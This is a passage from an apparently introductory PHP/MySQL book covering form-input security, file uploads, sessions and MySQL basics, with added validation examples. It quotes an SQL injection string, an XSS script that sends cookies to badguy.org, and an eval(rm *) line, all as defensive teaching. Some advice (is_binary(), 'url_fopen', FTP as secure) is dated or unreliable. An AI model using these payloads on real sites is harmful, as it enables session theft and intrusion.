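    $db->exec("INSERT INTO User VALUES ('alice', 'constructed-secret')");
    return $db;
}

// Before: the form values become part of the SQL text, as in the statement above.
function find_user_concatenated(PDO $db, string $userID, string $password): array
{
    $sql = "SELECT userID FROM User WHERE userID = '$userID' AND password = '$password'";
    return $db->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// After: the SQL text is fixed and the values travel separately as bound
// parameters, so quotes and -- inside them are compared as plain data.
function find_user_prepared(PDO $db, string $userID, string $password): array
{
    $stmt = $db->prepare("SELECT userID FROM User WHERE userID = ? AND password = ?");
    $stmt->execute([$userID, $password]);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

$db    = make_demo_db();
$typed = "John' OR 'foo' = 'foo' --";   // the input quoted in the text

$variants = [
    'concatenated' => 'find_user_concatenated',
    'prepared'     => 'find_user_prepared',
];
foreach ($variants as $label => $fn) {
    $rows = $fn($db, $typed, 'not-the-password');
    printf("%-12s matched %d row(s): %s\n", $label, count($rows), implode(', ', $rows));
}

// A legitimate login still works through the prepared statement.
printf("valid login  matched %d row(s)\n",
    count(find_user_prepared($db, 'alice', 'constructed-secret')));
```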

Another type of dangerous form input is when the attacker enters a script 
into your form field. For instance, the attacker might enter the following into 
a form field: 

<script>document.location='http://badguy.org/bad.php?cookies=' 
+ document.cookie </script> 

If you store this text and then send it to someone who visits your website, 
your visitor will send the cookies related to your application to the bad guy. 
Another bad script might be the following: 

<script language=php eval(rm *); </script> 

Testing for unexpected input 

You can make a couple of pretty accurate assumptions about the data you 
expect the user to enter. For instance, when you ask for a name, you expect 
the following to be true: 

♦ The data is alphabetical — no numbers. 

♦ The name might have a space, an apostrophe, or a hyphen, such as 
Mary Jane, O’Hara, or Anne-Marie. 

♦ The data certainly doesn’t include HTML tags or other bits of code. 

These assumptions are the keys to testing for unexpected input. Pass the 
input through a regular expression by using PHP’s preg_match() function 
to determine whether it contains any nonalphabetical characters, other than 
a space, an apostrophe, or a hyphen. 

Regular expressions (or regexes, for short) are the essence of all input testing. 
Refer to Chapter 2 of this minibook for an explanation of regular expressions. 

You need to do more than sanitize user input though. If you reflect any input 
back to the user, such as a confirmation screen, you must also sanitize HTML 
generated by your application and sent to the user. A malicious user can 
inject markup into your application to entice another user into clicking a link 
that takes him or her (unknowingly) away from your site to a phishing clone. 

To prevent this type of attack — it’s often referred to as user hijacking or 
cross site scripting — use htmlentities() on any value you plan to use to 
render HTML, as shown in this example: 

$inputString = "<b>Hello World</b>"; 
$safe_string = htmlentities($inputString); 

In this example, $safe_string would contain the following character string: 

&lt;b&gt;Hello World&lt;/b&gt; 

A better solution is to use preg_match again and make sure there are 
no unexpected characters in the input. Why bother allowing users to put 
HTML into their input? In other words, if you notice characters other than 
those allowed, simply error out and present the user with a message 
indicating that his or her input was not valid, as discussed in the next section. 

Handling the unexpected 

Most of the time, you test your user’s input, and it passes through your 
regular expressions without a hitch. But what do you do when something 
goes wrong? 

The simplest way to handle unexpected input is to stop the application 
completely. However, even though this method will stop bad data from getting 
into your application, it can also cause confusion and frustration for legitimate 
users who simply mistyped their information. 

Therefore, a better solution is to return the user to the input screen and ask 
him or her to try again. You can make the system more user friendly by letting 
the user know which fields caused problems. Book VI, Chapter 3, shows how 
to process forms, redisplaying the form when invalid data is entered in the 
form fields. 

If your tests catch something that looks like malicious activity, you might 
want to take additional steps, such as writing to the log file, notifying the 
administrator, or even blocking the IP address from which the offending 
input originated. 

Checking all form data 

Check all the information in your form, including any information that the user 
selects from lists, check boxes, or radio buttons. These fields can contain 
bad information as well. 

How does bad data get sent in from a drop-down or radio button? Easy. There 
are browser plug-ins that enable users to edit the values in GET and POST data right 
after the Submit button is clicked. So malicious people could simply change 
any of the values to whatever they wanted. 

The key for all of it is to validate what you expect to receive against what 
you actually received. You can check your list variables with regular 
expressions. For instance, the following regular expression matches only the 
specified text: 

// 'gender' is an example field name; ^ and $ anchor the match to the whole value 
preg_match("/^(male|female)$/", $_POST['gender']) 
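
The checks from the last three sections combined into one validator: a name test with preg_match(), an allowlist for a radio-button value, logging of rejected input, and htmlentities() on anything echoed back. This is an added example, not code from the book; the field names, messages and sample submissions are assumptions, and it is written for PHP 7 or later.

```php
<?php
// Added example: field names, messages and sample values are assumptions.

/**
 * Validate one submitted form.
 * Returns [$clean, $errors]: $clean holds only the values that passed,
 * $errors maps each failed field name to a message for the user.
 */
function validate_signup(array $post): array
{
    $clean  = [];
    $errors = [];

    // Name: letters plus space, apostrophe or hyphen, 1 to 50 characters.
    // ^ and \z anchor the pattern to the whole value, so "Jane<script>"
    // fails instead of matching on its leading "Jane".
    $name = (isset($post['firstName']) && is_string($post['firstName']))
        ? trim($post['firstName']) : '';
    if (preg_match("/^[A-Za-z][A-Za-z '-]{0,49}\\z/", $name) === 1) {
        // A valid name may contain an apostrophe (O'Hara), so passing this
        // test does not make the value safe to paste into SQL text.
        $clean['firstName'] = $name;
    } else {
        $errors['firstName'] = 'Use letters, spaces, apostrophes or hyphens only.';
    }

    // Radio button or drop-down: accept only a value the form itself offered.
    $allowedGenders = ['male', 'female'];
    $gender = isset($post['gender']) ? $post['gender'] : '';
    if (is_string($gender) && in_array($gender, $allowedGenders, true)) {
        $clean['gender'] = $gender;
    } else {
        $errors['gender'] = 'Choose one of the listed options.';
    }

    return [$clean, $errors];
}

// Constructed sample submissions (not real traffic).
$samples = [
    ['firstName' => 'Anne-Marie', 'gender' => 'female'],
    ['firstName' => "John' OR 'foo' = 'foo' --", 'gender' => 'male'],
    ['firstName' => '<b>Hello World</b>', 'gender' => 'other'],
];

foreach ($samples as $post) {
    list($clean, $errors) = validate_signup($post);
    if ($errors) {
        // Keep a record for the administrator, then tell the user which
        // fields to correct. Rejected input is escaped before it is shown.
        error_log('Rejected form input in: ' . implode(', ', array_keys($errors)));
        foreach ($errors as $field => $message) {
            $typed = is_string($post[$field]) ? $post[$field] : '';
            echo $field . ': ' . $message . ' You entered: '
               . htmlentities($typed, ENT_QUOTES, 'UTF-8') . "\n";
        }
    } else {
        echo 'Accepted: ' . htmlentities($clean['firstName'], ENT_QUOTES, 'UTF-8') . "\n";
    }
}
```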


Sanitizing Variables 

Sometimes, telling users to go back and try again when they fail to enter 
valid data simply isn’t an option. When you have to make do with what the 
user gives you, you can use a couple of techniques to make sure that bad 
data doesn’t break your application — or, worse, the underlying systems 
that support your application, such as e-mail transport and the operating 
system. The following sections tell you how to prevent bad user input from 
mucking up the works. 


Converting HTML special characters 

Sometimes, you want to allow users to enter HTML into your application. A 
blog comment system, for example, usually allows users to post hyperlinks. 
But you don’t have to open your application to just anything that users 
might want to put in. 

If you allow users to enter HTML, you should always convert HTML special 
characters to HTML entities by using the htmlentities() function. The 
htmlentities() function takes the string to be converted as its argument. 
The function then does a simple search-and-replace for the following 
HTML-special characters: 

♦ & (ampersand) becomes &amp;. 

♦ " (double quote) becomes &quot;. 

♦ ' (single quote) becomes &#039;. 

♦ < (less than) becomes &lt;. 

♦ > (greater than) becomes &gt;. 

If you need to escape every character with special meaning in HTML, 
use htmlentities() rather than htmlspecialchars(). See 
www.w3schools.com/html/html_entities.asp for more information on 
characters that have special meaning in HTML. 

Uploading files without compromising the filesystem 

Most applications don’t need to upload files. These applications are more 
secure if you don’t allow file uploads. You can prevent file uploading 
with the file_uploads setting in your php.ini file. The setting is on by 
default, as follows: 

file_uploads = On 

Change the setting to Off to prevent any file uploads in PHP scripts. 

Some applications need to let users upload files. Unfortunately, this 
requirement also creates the potential for serious security problems. Malicious 
users can 

♦ Launch Denial of Service (DoS) attacks. 

♦ Overwrite existing files. 

♦ Place malicious code on the server for later use. 

Because of the open nature of web applications, you can’t completely secure 
file upload functionality within your application, but you can mitigate the 
dangers. 

Avoiding DoS attacks on the filesystem 

File uploads create the potential for DoS attacks because malicious users 
can upload extremely large files and use all available resources in the 
filesystem in the process. Uploading large files can effectively bring the server 
down by preventing it from writing temporary files or virtual memory swap 
files. You can limit file sizes in php.ini, but doing so doesn’t prevent a 
scripted attack that tries to upload hundreds of 2MB files every second. 

You should certainly place limits on file sizes in php.ini. You should also 
create a separate filesystem specifically for uploaded files. This separate 
system keeps any mischief locked away from the rest of the server. The 
upload filesystem might fill up with junk files, making the file upload 
functionality of your application unavailable — but at least the entire server 
wouldn’t crash. 

Validating files 

After a file is uploaded, you should validate that it’s a legitimate file. Although 
you might not be able to weed out every malicious upload, you can cut down 
on the most obvious ones. Here are a few ways you can validate files: 

♦ Verify the filename extension. This check isn’t the most robust test 
(because someone can easily rename a file with a new extension), but 
it’s simple to do and can catch some of the less-sophisticated crackers 
who try to upload files such as spam_sender.php by using your image 
upload function. 

♦ Test for the basic file type you’re expecting. For example, if you’re 
expecting images, you can use the is_binary() function to weed out 
text files, such as PHP scripts, as shown in the following example: 

$input = $_POST['input_file']; 
if (is_binary($input)) { 
    // proceed as normal 
} else { 
    // reject the file, redirect the browser, etc. 
} 

♦ Run the file through an antivirus utility such as F-Prot (available at 
www.f-prot.com). 
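
A fuller version of the size, extension and file-type checks described above, applied to an upload received through $_FILES and using PHP's fileinfo extension for the file-type test. This is an added example, not code from the book: the field name avatar, the 2 MB limit, the allowed types and the /var/uploads directory (standing in for the separate upload filesystem) are assumptions, and it needs PHP 7 or later.

```php
<?php
// Added example: the field name "avatar", the size limit, the allowed types
// and the /var/uploads directory are assumptions.

const MAX_UPLOAD_BYTES = 2 * 1024 * 1024;    // 2 MB
const ALLOWED_TYPES = [                      // extension => expected MIME type
    'png' => 'image/png',
    'jpg' => 'image/jpeg',
    'gif' => 'image/gif',
];
const UPLOAD_DIR = '/var/uploads';           // separate filesystem for uploads

/**
 * Check one entry of $_FILES.
 * Returns [true, extension] on success or [false, reason] on failure.
 */
function check_upload(array $file): array
{
    // A single-file field has scalar values; arrays mean a crafted request.
    if (!isset($file['error'], $file['tmp_name'], $file['name'])
        || is_array($file['error'])) {
        return [false, 'malformed upload'];
    }
    if ($file['error'] !== UPLOAD_ERR_OK) {
        return [false, 'upload error code ' . $file['error']];
    }
    // Only accept a temporary file that PHP created for this request.
    if (!is_uploaded_file($file['tmp_name'])) {
        return [false, 'not an uploaded file'];
    }
    if (filesize($file['tmp_name']) > MAX_UPLOAD_BYTES) {
        return [false, 'file too large'];
    }
    // Extension test: cheap, and catches names such as spam_sender.php.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!array_key_exists($ext, ALLOWED_TYPES)) {
        return [false, 'extension not allowed'];
    }
    // $file['type'] is sent by the browser, so the type is read from the
    // file content instead and must agree with the extension.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    if ($finfo->file($file['tmp_name']) !== ALLOWED_TYPES[$ext]) {
        return [false, 'content does not match extension'];
    }
    return [true, $ext];
}

if (isset($_FILES['avatar'])) {
    list($ok, $detail) = check_upload($_FILES['avatar']);
    if (!$ok) {
        error_log('Upload rejected: ' . $detail);
        http_response_code(400);
        exit('The file could not be accepted.');
    }
    // A server-generated name means the client's filename never reaches the
    // filesystem, so an upload cannot overwrite an existing file.
    $target = UPLOAD_DIR . '/' . bin2hex(random_bytes(16)) . '.' . $detail;
    if (!move_uploaded_file($_FILES['avatar']['tmp_name'], $target)) {
        error_log('Could not store upload');
        http_response_code(500);
        exit('The file could not be stored.');
    }
    echo 'Upload stored.';
}
```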

Using FTP functions to ensure safe file uploads 

It’s fairly common for web applications to allow users to upload files for one 
reason or another. For instance, some message boards allow users to upload 
small images or avatars that are shown next to each of that user’s posts. 
Other applications allow you to upload data files for analysis. You could use 
PHP’s built-in fopen() function, which automatically opens a stream to a 
file or URL that allows users to upload files. Unfortunately, this method is 
ripe for exploitation by malicious users who can use it to upload files from 
remote servers onto your web server. 

Preventing this type of exploitation requires you to disable two settings in 
php.ini: register_globals and url_fopen. Disabling these settings 
prevents users from using PHP’s built-in file upload without you explicitly 
enabling that functionality. 

After you disable these two settings in php.ini, you still need to allow 
users to upload files. Use PHP’s FTP function set, a much more secure 
method than fopen(), to allow users to upload files. 

You can use the FTP functions fairly intuitively. First, you establish a 
connection, then you upload the files you need, and finally, you close the 
connection. Listing 5-1 shows how to use the FTP functions in PHP: 

Listing 5-1: Using Basic FTP Functions 

<?php 
// set up basic connection 
$connection_id = ftp_connect($ftp_server); 

// login with username and password 
$login_result = ftp_login($connection_id, $ftp_username, $ftp_password); 

// check connection 
if ((!$connection_id) || (!$login_result)) { 
    echo "FTP connection has failed!"; 
    echo "Attempted to connect to $ftp_server for user $ftp_username"; 
    exit; 
} else { 
    echo "Connected to $ftp_server, for user $ftp_username"; 
} 

// upload the file 
$upload = ftp_put($connection_id, $destination_file, $source_file, FTP_BINARY); 

// check upload status 
if (!$upload) { 
    echo "FTP upload has failed!"; 
} else { 
    echo "Uploaded $source_file to $ftp_server as $destination_file"; 
} 

// close the FTP stream (the same handle that ftp_connect() returned) 
ftp_close($connection_id); 
?> 

Here are the most common FTP functions and their arguments: 

♦ ftp_connect( string $host [, int $port [, int $timeout ]] ): Connect 
to the FTP server — in this case, your web server. 

♦ ftp_login( resource $ftp_stream, string $username, 
string $password ): Send login credentials to the FTP server. 

♦ ftp_put( resource $ftp_stream, string $remote_file, 
string $local_file, int $mode [, int $startpos] ): Put a 
file from the local machine to the server. 

♦ ftp_get( resource $ftp_stream, string $local_file, 
string $remote_file, int $mode [, int $resumepos] ): Get 
a file from the server and send it to a local machine. 

♦ ftp_close( resource $ftp_stream ): Close the connection to the 
server. 

You need to close the FTP stream as soon as you’re finished with it; 
otherwise, you have an open connection that’s vulnerable to hijacking. 


Chapter 6: Tracking Visitors 
with Sessions 


In This Chapter 

Understanding sessions and cookies 
Using sessions 


This chapter looks at PHP’s built-in method for keeping track of visitors 
across multiple pages, called a session. The chapter starts out with an 
introduction to sessions and cookies and then jumps straight in by showing 
you how to use sessions to track visitors. 


Understanding Sessions and Cookies 

You’ve undoubtedly seen websites that track who you are, possibly 
welcoming you after you log in or presenting you with custom information about 
your account after logging in. There are a couple ways to do this, including 
sending the data along in a form with every request. But that isn’t secure 
and isn’t nearly flexible enough for today’s web applications. Luckily, 
there’s a better way — and it’s right at your fingertips: sessions. 

Looking at sessions 

A session in PHP is a secure way to track a user from page to page. With a 
session, you can store information about users, such as their e-mail address, 
name, phone number, and whatever other details you have, and automatically 
fill in that information wherever it’s needed on the site. For example, say 
that on login you load the user’s first name and e-mail address from your 
user database. You can store that information in a session, essentially 
hidden from the user, until you use it. 

You use session variables as you would any other variables. Behind the 
scenes, sessions are stored in an array called $_SESSION. You store values 
just as you would with a named array in PHP. For example, you can keep 
track of an e-mail address and name like this: 

$_SESSION['emailAddress'] = "me@example.com"; 
$_SESSION['firstName'] = "Steve"; 

You can also use sessions to keep track of information filled in on a web form 
without having to carry that information through the site in hidden form 
variables. 

Working with cookies 

Sessions are passed in browser cookies, which are little extra bits of 
information that get sent to and from a web browser. The actual bits of information, 
or what those bits actually are, is up to you, the programmer. For instance, 
you could send a cookie that contains the user’s name. The cookie could then 
be stored on the user’s computer and the next time she visits the site, the 
cookie would be sent to your program, which would then present a 
personalized greeting. 

However, cookies are like any other data that you get from a user — the data 
from cookies needs to be sanitized (as we discuss in the preceding chapter) 
because it can’t be trusted. In other words, once your program sends a cookie 
to a visitor’s browser, the visitor can edit or change that cookie to be 
anything he wants. So if you (the web developer) are using the cookie to store 
a username, the visitor can change the username to whatever he wants and 
then send it back to your program. 

The possibility of users editing their cookies is largely solved by simply 
using sessions. When a session cookie is created, it uses a hash value, 
which is a long string of characters. This means that even if users change 
the cookie value, in other words, if they change that hash, they aren’t really 
changing anything that you’re using in your program directly. 

Instead, PHP handles the translation of that hash from the cookie on your 
behalf, and then you can get on with the business of using things in the 
$_SESSION array, as explained earlier. The actual values that you store in the 
$_SESSION array are never seen by the user; they exist only on the server. 

Of course, using sessions with cookies means that cookies need to be 
enabled in the user’s browser. If they aren’t, then the user can’t use the 
application. Therefore, the logical place to continue this discussion is by 
showing how to check if cookies are enabled. 

Checking if cookies are enabled 

You use the setcookie() function in PHP to set a cookie in the browser. 
Then if your program can read that cookie, you know that cookies are 
enabled. The setcookie() function accepts several arguments to define 
the behavior of the cookie. For example, you set the name of the cookie, but 
you can also set how long the cookie will be active and whether it will be 
used over secure connections only, along with several other options. 

For our purposes, we simply set the name of the cookie and a value. You can 
follow these steps to check if cookies are enabled in your browser. 

1. Open your text editor and create a new empty file. 

2. Within the file, enter the following code: 

<?php 
if (isset($_GET['cookiecheck'])) { 
    if (isset($_COOKIE['testcookie'])) { 
        print "Cookies are enabled"; 
    } else { 
        print "Cookies are not enabled"; 
    } 
} else { 
    setcookie('testcookie', "testvalue"); 
    die(header("Location: " . $_SERVER['PHP_SELF'] . 
        "?cookiecheck=1")); 
} 
?> 

3. Save the file as cookie.php in your document root. 

4. Point your web browser toward http://localhost/cookie.php 
and you’ll see a page like the one in Figure 6-1. 

If cookies aren’t enabled in your browser, you’ll see a page like that in 
Figure 6-2. 


Figure 6-2: Showing that cookies are not enabled. 



Note: If you’d like to test the page with cookies disabled, you can do so. 

First, close the browser and then reopen it (without going to the cookie.php 
page). In Internet Explorer, go to Internet Options. On the Privacy tab, 
slide the Settings slider up to block all cookies. In Firefox, go to Options, and 
select the Privacy tab. Within the History section, select Use custom settings 
for history and then uncheck the “Accept cookies from sites” check box. 

Now load the cookie.php page. 

Now that you know that cookies are enabled you can safely begin to use 
sessions. 


Using Sessions to Pass Data 

With cookies enabled, which they usually are in most browsers, you can 
begin to use sessions to store data between pages of your PHP application. 

Starting a session 

The key to using sessions is the session_start() function. You call 
session_start() on every page and subsequently have access to all the 
items in the $_SESSION array. 

It might seem like a bit of an odd name for the function, session_start(), 
because on most pages you really just want to continue the session and 
access the variables that are there. But in reality, session_start() does 
both: It starts a new session if need be and continues an existing session 
where appropriate. 

The session_start() function is called simply like this: 

<?php 

session_start(); 

// Other PHP statements here 
?> 

Here’s code for a few pages that track when you accessed the first page of 
the application. This shows the use of the session_start() function and 
then creation of a variable to hold the initial access time. 

Listing 6-1 shows the code for the first page, called page1.php. 


Listing 6-1: Creating a Session Variable 

<?php 
session_start(); 
$_SESSION['accessTime'] = date("M/d/Y g:i:sa"); 
print "This is page 1<br />"; 
print "You accessed the application at: " . $_SESSION['accessTime']; 
print "<div><a href=\"page2.php\">Continue to next page</a></div>"; 
?> 


When viewed in a browser, the page looks like Figure 6-3. 


Figure 6-3: Accessing the first page of the application. 



The next page in the application then starts the session and can access any 
variables already set in the session. Listing 6-2 shows code for the second 
page, page2.php. 


Listing 6-2: The Second Page Accessing Session Variables 

<?php 
session_start(); 
print "This is page 2<br />"; 
print "You accessed the application at: " . $_SESSION['accessTime']; 
print "<div><a href=\"page3.php\">Continue to next page</a></div>"; 
?> 

Notice in the code in Listing 6-2 that the variable 
$_SESSION['accessTime'] is not set again, but merely accessed after the 
session is started. When you’re on page1.php and click the link to go to the 
next page, you get a page like that in Figure 6-4. 























Figure 6-4: Accessing the second page of the application. 

You can store just about anything in a session, but you should be aware that 
a session can, and sometimes does, disappear for a variety of reasons. One 
reason a session might disappear is that it times out. If users sit on a page 
for too long, the session might not be there when they begin using the 
application again. 

In Book VII, you see how to change the session timeout value. However, even 
if you change the session timeout, the session can still go away. For example, 
if users clear their cookies in the middle of a session, then the session 
cookie will disappear and a new one will be started. 

The practical implication of session disappearance is that any variables 
you’ve previously set will also disappear. Therefore, it’s good practice to 
check if the session contains the values that you expect prior to using them. 
There are a couple ways to do this. One way would be to check all variables 
prior to accessing them. For example, you could change Listing 6-2 to check 
for the $_SESSION['accessTime'] variable prior to using it in output. 
Listing 6-3 shows what that would look like. 


Listing 6-3: Checking if a Session Variable is Set before Using It

<?php
session_start();

if (!isset($_SESSION['accessTime'])) {
    die(header("Location: page1.php"));
}

print "This is page 2<br />";
print "You accessed the application at: " . $_SESSION['accessTime'];
print "<div><a href=\"page3.php\">Continue to next page</a></div>";
?>


Listing 6-3 added the following code: 

if (!isset($_SESSION['accessTime'])) {
    die(header("Location: page1.php"));
}



The location of that code is important. Because that code needs to send an
HTTP header, it needs to appear prior to any other output. So, for instance,
if that code appeared below the “This is page 2” output, it wouldn’t work
because the headers would have already been sent. The code appears prior to
any output but also, importantly, after the session_start() function.


Best practice is to check for the existence of session variables before you 
use them, as just shown. However, it can get quite cumbersome to check 
all the variables that you might use in a big application. With that in mind, 
another option is to set a global session variable and check for its existence 
rather than each variable individually. Here’s how to do that. 


Listing 6-4 shows an updated version of Listing 6-1, page1.php. In this
code, there’s a single addition, a new session variable called appStarted.


Listing 6-4: Adding a Global Variable for Session

<?php
session_start();

$_SESSION['appStarted'] = true;
$_SESSION['accessTime'] = date("M/d/Y g:i:sa");

print "This is page 1<br />";
print "You accessed the application at: " . $_SESSION['accessTime'];
print "<div><a href=\"page2.php\">Continue to next page</a></div>";
?>

You can then change other pages in the application to check for the
existence of this variable, as in the change noted in Listing 6-5.


Listing 6-5: Checking for the Global Session Variable

<?php
session_start();

if (!isset($_SESSION['appStarted'])) {
    die(header("Location: page1.php"));
}

print "This is page 2<br />";
print "You accessed the application at: " . $_SESSION['accessTime'];
print "<div><a href=\"page3.php\">Continue to next page</a></div>";
?>

Closing a session

Now you know how to start a session, but how do sessions get closed? The 
long and short of it is that sessions close at the end of the PHP program. 

This means that you don’t need to do anything explicit in order to close 
sessions. 

Using session_write_close()

There are certain situations where you do in fact need to explicitly close the
session. This might be the case if two programs or two sections of a program
need to write to the session at the same time — or if you’re using a redirect
and the server doesn’t quite get the session closed in time before the next
page tries to pick up the session. In either case, the session_write_close()
function will write the session parameters to the server and close or end the
session. You call session_write_close() just like session_start():

session_write_close();

Any attempt to write a session variable after session_write_close() has
been called may result in an error or may fail silently, depending on your
PHP configuration.
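
The checks from Listings 6-3 and 6-5 and the explicit session_write_close() before a redirect can be combined into one guard, shown here as an added example that is not code from the book. The function names, the lastSeen key and the 1800-second idle limit are assumptions made for illustration.

```php
<?php
// Added example, not from the book. Assumed names: session_is_usable(),
// require_app_session(), the 'lastSeen' key and the 1800-second idle limit.

const MAX_IDLE_SECONDS = 1800; // assumed value for illustration

/**
 * Pure check: does the session array hold everything this page needs,
 * and was it used recently enough?
 */
function session_is_usable(array $session, array $requiredKeys, int $now): bool
{
    // The global marker set by page1.php (Listing 6-4).
    if (empty($session['appStarted'])) {
        return false;
    }
    // Every value the page is about to print must really be there.
    foreach ($requiredKeys as $key) {
        if (!isset($session[$key])) {
            return false;
        }
    }
    // Idle limit enforced by the application itself. A session that has
    // not passed through the guard yet counts as fresh.
    $lastSeen = $session['lastSeen'] ?? $now;
    return is_int($lastSeen) && ($now - $lastSeen) <= MAX_IDLE_SECONDS;
}

/**
 * Call at the top of every page after page1.php, before any output.
 */
function require_app_session(array $requiredKeys, string $startPage = 'page1.php'): void
{
    session_start();

    if (!session_is_usable($_SESSION, $requiredKeys, time())) {
        // Drop whatever partial state is left so the start page begins clean.
        $_SESSION = [];
        // Write and release the session before redirecting, so the next
        // request does not pick up the session before it has been saved.
        session_write_close();
        header('Location: ' . $startPage);
        exit; // nothing below may run or be sent for an invalid session
    }

    $_SESSION['lastSeen'] = time();
}

// page2.php, rewritten to use the guard.
require_app_session(['accessTime']);

print "This is page 2<br />";
// Escape on output: session data is still data, not markup.
print "You accessed the application at: "
    . htmlspecialchars($_SESSION['accessTime'], ENT_QUOTES, 'UTF-8');
print "<div><a href=\"page3.php\">Continue to next page</a></div>";
```

Because the redirect and the exit sit inside one function, a page cannot send the header and then carry on printing protected content.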

Understanding Other Session Options

Several options are available when working with sessions in PHP, many of 
which you’ll never encounter and others that you’ll encounter in special 
situations. Table 6-1 lists some of the options. 


Table 6-1: Selecting Session Options

Option            Description
session_id        Obtain the current session identifier or set one.
session_name      Obtain the current session name or set one.
session_destroy   Unset all variables from the current session.


Book VI shows the use of session_destroy in order to provide logout 
functionality on a website. 

You can read about other session-related functions on the PHP website at 

www.php.net/manual/book.session.php. 










Book V


MySQL 



For more info on MySQL, go to
www.dummies.com/extras/phpmysqljavascripthtml5aio.

Chapter 1: Introducing MySQL


In This Chapter 

Discovering how MySQL works 
Communicating with MySQL 
Securing data stored in MySQL


Many dynamic websites require a backend database. The database can
contain information that the web pages display to the user, or the
purpose of the database might be to store information provided by the user.
In some applications, the database both provides available information and
stores new information.


MySQL, the most popular database for use in websites, was developed to be 
fast and small, specifically for websites. MySQL is particularly popular for 
use with websites that are written in PHP, and PHP and MySQL work well 
together. 

This chapter provides an introduction to MySQL, and explains how it works
and how you can communicate with it. As discussed in Book IV, Chapter 3, 
much of this information also applies to the SQLite database introduced in 
that chapter. 


Examining How MySQL Works

The MySQL software consists of the MySQL server, several utility programs 
that assist in the administration of MySQL databases, and some supporting 
software that the MySQL server needs (but you don’t need to know about). 
The heart of the system is the MySQL server. 

The MySQL server is the manager of the database system. It handles all your 
database instructions. For instance, if you want to create a new database, you 
send a message to the MySQL server that says, for instance, “create a new 
database and call it newdata.” The MySQL server then creates a subdirectory 
in its data directory, names the new subdirectory newdata, and puts the
necessary files with the required format into the newdata subdirectory. In the
same manner, to add data to that database, you send a message to the MySQL 
server, giving it the data and telling it where you want the data to be added. 






Before you can pass instructions to the MySQL server, it must be running 
and waiting for requests. The MySQL server is usually set up so that it starts 
when the computer starts and continues running all the time. This is the 
usual setup for a website. However, it isn’t necessary to set it up to start 
when the computer starts. If you need to, you can start it manually whenever 
you want to access a database. When it’s running, the MySQL server listens 
continuously for messages that are directed to it. Installing and starting the 
MySQL server are discussed in Book I, Chapter 4.


Understanding Database Structure 

MySQL is a Relational Database Management System (RDBMS). Your MySQL 
server can manage many databases at the same time. In fact, many people 
might have different databases managed by a single MySQL server. Each 
database consists of a structure to hold the data and the data itself. A
database can exist without data, only a structure, be totally empty, twiddling
its thumbs and waiting for data to be stored in it.

Data in a database is stored in one or more tables. You must create the
database and the tables before you can add any data to the database. First you
create the empty database. Then you add empty tables to the database.

Database tables are organized like other tables that you’re used to — in 
rows and columns. Each row represents an entity in the database, such as a 
customer, a book, or a project. Each column contains an item of information 
about the entity, such as a customer name, a book name, or a project start 
date. The place where a particular row and column intersect, the individual 
cell of the table, is called a field. 

Tables in databases can be related. Often a row in one table is related to
several rows in another table. For instance, you might have a database
containing data about books you own. You would have a book table and an
author table. One row in the author table might contain information about
the author of several books in the book table. When tables are related, you
include a column in one table to hold data that matches data in the column
of another table.

Only after you’ve created the database structure can you add data. More
information on database structure and instructions for creating the structure
is provided in Chapter 3 of this minibook.


Communicating with MySQL

All your interaction with the database is accomplished by passing messages 
to the MySQL server. The MySQL server must be able to understand the 
instructions that you send it. You communicate using Structured Query
Language (SQL), which is a standard computer language understood, at least 
in some form, by most database management systems. 

To make a request that MySQL can understand, you build a SQL statement 
and send it to the MySQL server. The following sections tell you how to do 
that. 

Building SQL queries

SQL is almost English; it’s made up largely of English words, put together into
strings of words that sound similar to English sentences. In general
(fortunately), you don’t need to understand any arcane technical language to
write SQL queries that work.

The first word of each statement is its name, which is an action word (a
verb) that tells MySQL what you want to do. The statements that we discuss
in this minibook are CREATE, DROP, ALTER, SHOW, INSERT, LOAD, SELECT,
UPDATE, and DELETE. This basic vocabulary is sufficient to create — and
interact with — databases on websites.

The statement name is followed by words and phrases — some required and 
some optional — that tell MySQL how to perform the action. For instance,
you always need to tell MySQL what to create, and you always need to tell it 
which table to insert data into or to select data from. 

The following is a typical SQL statement. As you can see, it uses English words: 

SELECT lastName FROM Member 

When a statement uses SELECT, it’s known as a query, because you’re
querying the database for information. This query retrieves all the last
names stored in the table named Member. More complicated queries, such
as the following, are less English-like:

SELECT lastName, firstName FROM Member WHERE state="CA" AND
city="Fresno" ORDER BY lastName

This query retrieves all the last names and first names of members who live
in Fresno and then puts them in alphabetical order by last name. Although
this query is less English-like, it’s still pretty clear.

Here are some general points to keep in mind when constructing a SQL 
statement, as illustrated in the preceding sample queries: 

♦ Capitalization: In this book, we put SQL language words in all caps; 
items of variable information (such as column names) are usually given 
labels that are all or mostly lowercase letters. We did this to make it 
easier for you to read — not because MySQL needs this format. The case
of the SQL words doesn’t matter; for example, select is the same as
SELECT, and from is the same as FROM, as far as MySQL is concerned.

On the other hand, the case of the table names, column names, and
other variable information does matter if your operating system is Unix
or Linux. When you’re using Unix or Linux, MySQL needs to match the
column names exactly, so the case for the column names has to be
correct — for example, lastname isn’t the same as lastName. Windows,
however, isn’t as picky as Unix and Linux; from its point of view,
lastname and lastName are the same.

♦ Spacing: SQL words must be separated by one or more spaces. It 
doesn’t matter how many spaces you use; you could just as well use 20 
spaces or just 1 space. SQL also doesn’t pay any attention to the end of 
the line. You can start a new line at any point in the SQL statement or 
write the entire statement on one line. 

♦ Quotes: Notice that CA and Fresno are enclosed in double quotes (") 
in the preceding query. CA and Fresno are a series of characters called 
text strings, or character strings. You’re asking MySQL to compare the text 
strings in the SQL query with the text strings already stored in the
database. When you compare numbers (such as integers) stored in numeric
columns, you don’t enclose the numbers in quotes. (In Chapter 3 of this 
minibook, we explain the types of data that you can store in a MySQL 
database.) 

We discuss the details of specific SQL queries in the sections of the book 
where we discuss their uses. For instance, in Chapter 3 in this minibook, we 
discuss the CREATE query in detail when we cover the details of creating the
database structure; we also discuss the INSERT query when we tell you how
to add data to the database. 

Sending SQL queries

You can send a SQL query to MySQL several ways. In this book, we cover the 
following two methods of sending queries: 

♦ The mysql client: When you install MySQL, a text-based mysql client is 
automatically installed. This simple client can be used to send queries. 

♦ PHP built-in functions: You communicate with a MySQL database from 
PHP scripts by using PHP built-in functions designed specifically for this 
purpose. The functions connect to the MySQL server and send the SQL 
query. Accessing MySQL databases from PHP scripts is discussed in 
detail in Chapter 5 of this minibook. 

When MySQL is installed, a simple, text-based program called mysql (or
sometimes the command line interface or the CLI) is also installed. Programs
that communicate with servers are client software; because this program
